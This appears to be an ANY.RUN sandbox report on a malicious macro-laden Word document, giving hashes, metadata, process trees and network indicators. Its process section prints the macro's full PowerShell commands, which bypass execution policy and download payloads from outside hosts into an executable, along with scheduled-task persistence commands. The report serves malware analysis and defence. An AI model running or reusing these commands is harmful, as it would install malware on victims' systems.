analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

c9f953e3ef57d802c9520d4c0994f34a.doc

Full analysis: https://app.any.run/tasks/b24fd7b1-c594-4efe-a270-96f9f3753d5c
Verdict: Malicious activity
Analysis date: March 31, 2020, 02:37:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

C9F953E3EF57D802C9520D4C0994F34A

SHA1:

2385BD3B79CA9971E7A93970F306B79C0E5E91FF

SHA256:

5D612D788C4D6A34E9CF7C139DFA504387CF321DC27089E7436BC7E5F132D662

SSDEEP:

768:E/cLMxQqYYSs75GnFLFpUztKkd/WTKfEV6FHCoIQgvjhdcYuNN+N8/Hm7ektOy8:vSYfvFLFMATKfJV+9dhEm7ektq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 2764)
      • WINWORD.EXE (PID: 1632)
      • WINWORD.EXE (PID: 3000)
      • WINWORD.EXE (PID: 3088)

  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 3844)
      • WINWORD.EXE (PID: 2640)

    • Application launched itself

      • WINWORD.EXE (PID: 2896)

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2896)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3844)
      • WINWORD.EXE (PID: 2896)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: -
Subject: -
Title: -

XML

ModifyDate: 2019:03:31 02:31:00Z
CreateDate: 2020:03:09 00:44:00Z
RevisionNumber: 1
LastModifiedBy: -
Keywords: -
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 11
LinksUpToDate: No
Company: -
TitlesOfParts: -
HeadingPairs:
  • タイトル
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 11
Words: 1
Pages: 4
TotalEditTime: -
Template: Normal.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1827
ZipCompressedSize: 443
ZipCRC: 0x42a89663
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
7
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe winword.exe

Process information

PID
CMD
Path
Indicators
Parent process
2896"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\c9f953e3ef57d802c9520d4c0994f34a.doc.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2764"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncNet /TR "%APPDATA%\GncNet\smssr.exe BoostPC GncSoftware" /SC MINUTE /MO 10 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3000"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostPC /TR "%USERPROFILE%\BoostPC\BoostPC.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3088"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn BoostB2B /TR "%USERPROFILE%\BoostPC\b2bClient.exe" /SC MINUTE /MO 16 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1632"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /create /tn GncSoftware /TR "%APPDATA%\GncSoftware\GncSoftware.exe" /SC MINUTE /MO 30 /f /SD 04-01-2020C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3844"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -ep Bypass -Command mkdir $env:APPDATA\GncNet ; $cli = New-Object System.Net.WebClient ; $cli.Headers['User-Agent'] = 'Mozila/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20191232 FireFox/72.0' ; $cli.DownloadFile('http://wp.hitominote.com/smessr/retouch8.php', $env:APPDATA + '\GncNet\smssr.db') ; While($true){ if ((Get-Item $env:APPDATA'\GncNet\smssr.db').length -eq 8704){ Copy-Item -force -Path $env:APPDATA'\GncNet\smssr.db' -Destination $env:APPDATA'\GncNet\smssr.exe'; $rr='2020' ; Break }} ; $cli.DownloadFile('http://wp.hitominote.com/smessr/favicon.ico?'+$rr, $env:APPDATA+'\GncNet\c.db')C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2640"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -ep Bypass -Command mkdir $env:USERPROFILE\BoostPC ; $cli = New-Object System.Net.WebClient ; $cli.Headers['User-Agent'] = 'Mozila/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20191232 FireFox/72.0' ; $cli.DownloadFile('http://nano.toyota-rnd.com/cdn/proc1.php', $env:USERPROFILE + '\BoostPC\BoostPC.db') ; While($true){ if ((Get-Item $env:USERPROFILE'\BoostPC\BoostPC.db').length -eq 11264){ Break }} ; $cli.DownloadFile('http://nano.toyota-rnd.com/cdn/favicon.ico?'+$rr, $env:USERPROFILE+'\BoostPC\c.db')C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Total events
1 909
Read events
1 115
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
2896WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6F0E.tmp.cvr
MD5:
SHA256:
2896WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8158F2A78EA25D9CDB16A209393DBA15
SHA256:9D92FE0455EF8B32F06D17740716398E933ED7B64C9D740CBE5059B9B3A1CBDE
2896WINWORD.EXEC:\Users\admin\Desktop\~$f953e3ef57d802c9520d4c0994f34a.doc.docmpgc
MD5:CEAADF57DD55FE0DEF947929A916C965
SHA256:1ED4DF2F6088C31AB35514FC5C34B5ED94B2944A9C2F5C0B45C076C3126F8BB3
2896WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\c9f953e3ef57d802c9520d4c0994f34a.doc.docm.LNKlnk
MD5:D3EEE54A8428CF71C79FED62F5691E28
SHA256:427EBCAD969DF76F20564416D935D48CB1E81C23242DA3C4C4F7161D9568185A
2896WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:84F4A11791B7E9D92B1C759791B6C6C5
SHA256:7C526864CDFF3D218BDCC5201CF39C708E3F3B2F18EEB87447FA11C432F55429
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3844
WINWORD.EXE
GET
404
88.119.160.2:80
http://wp.hitominote.com/smessr/retouch8.php
LT
html
315 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3844
WINWORD.EXE
88.119.160.2:80
wp.hitominote.com
Informacines sistemos ir technologijos, UAB
LT
unknown
2640
WINWORD.EXE
111.90.144.164:80
nano.toyota-rnd.com
Shinjiru Technology Sdn Bhd
MY
suspicious

DNS requests

Domain
IP
Reputation
wp.hitominote.com
  • 88.119.160.2
unknown
nano.toyota-rnd.com
  • 111.90.144.164
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
c9f953e3ef57d802c9520d4c0994f34a.doc